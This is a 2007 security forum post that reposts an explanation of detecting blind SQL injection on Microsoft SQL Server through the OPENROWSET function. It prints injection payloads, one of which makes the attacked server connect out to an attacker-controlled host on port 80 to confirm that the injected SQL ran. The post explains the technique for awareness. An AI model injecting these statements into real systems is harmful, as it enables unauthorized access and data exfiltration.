Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
June 23, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 242
Members: 0
Total: 242
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Detection Of Sql Injection Vulnerabilities
Post new topic  Reply to topic View previous topic :: View next topic 
Detection Of Sql Injection Vulnerabilities
PostPosted: Sun Feb 11, 2007 4:39 pm Reply with quote
Dinosaurio
Regular user
Regular user
 
Joined: Aug 11, 2006
Posts: 10




Hi,


Many developers and web administrators are complacent about SQL Injection vulnerabilities if the attacker cannot see the SQL error messages and/or cannot return the queries result directly to the browser.This topic was first addressed in a white paper written by Chris Ansley of NGSSoftware

(http://www.nextgenss.com/papers/more...injection.pdf). This paper will
expand on possible ways this threat can be used. When trying to exploit SQL Injection in an application, an attacker needs a method of determining if the SQL injected is executed on the server. As well, a method of retrieving the results is needed. Two built-in functions of SQL Server can be used for this purpose. The OPENROWSET and OPENDATASOURCE
functions allow a user in SQL Server to open remote data sources. These functions are used to open a connection to an OLEDB provider. The OPENROWSET function will be use in all the examples but the OPENDATASOURCE function could be used with the same results.
This statement will return all the rows of table1 on the remote data source:

select * from
OPENROWSET( 'SQLoledb',
'server=servername;uid=sa;pwd=h8ck3r',
'select * from table1' )

Parameters:
(1) OLEDB Provider name
(2) Connection string (could be an OLEDB data source or an ODBC connection string)
(3) SQL statement

The connection string parameter can specify other options such as the network library to use or the IP address and port to which to connect. Below is an example.

select * from
OPENROWSET('SQLoledb',
'uid=sa;pwd=h8ck3r;Network=DBMSSOCN;Address=10.0.0 .10,1433;',
'select * from table' )

In this example, SQL Server will use the OLEDB provider SQLoledb to execute the SQL statement. The OLEDB provider will use the SQL Server sockets library (DBMSSOCN) to connect to port 1433 on the IP address 10.0.0.10 and will return the results of the SQL statement to the local SQL Server. The login sa and the password h8ck3r will be used to authenticate to the remote data source.

The next example demonstrates how the OPENROWSET function can be used to connect to an arbitrary IP address/port including the source IP address and port of the attacker. In this case the hacker?s host name is hackersip and a version of Microsoft SQL Server is running on port 80. ?hackersip? can be replaced with an IP address and the port can be any port the hacker would like to direct connections to.

select * from
OPENROWSET('SQLoledb',
'uid=sa;pwd=;Network=DBMSSOCN;Address=hackersip,80 ;',
'select * from table')

WWW.APPSECINC.COM
By injecting this SQL statement, an attacker can determine if the statement is being executed. If the SQL is successfully executed, the attacked server will issue an outbound connection attempt to the attacker?s computer on the port specified. It is also unlikely that the firewall will block this outbound SQL connection because the connection is occurring over port 80.

This technique allows the attacker to determine if injected SQL statements executed even if error messages and query results are not returned to the browser.


Enjoy reading


Good Luck

Dino


PD:
Font :Cesar Cerrudo (sqlsec@yahoo.com)
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
Detection Of Sql Injection Vulnerabilities
  www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.181 Seconds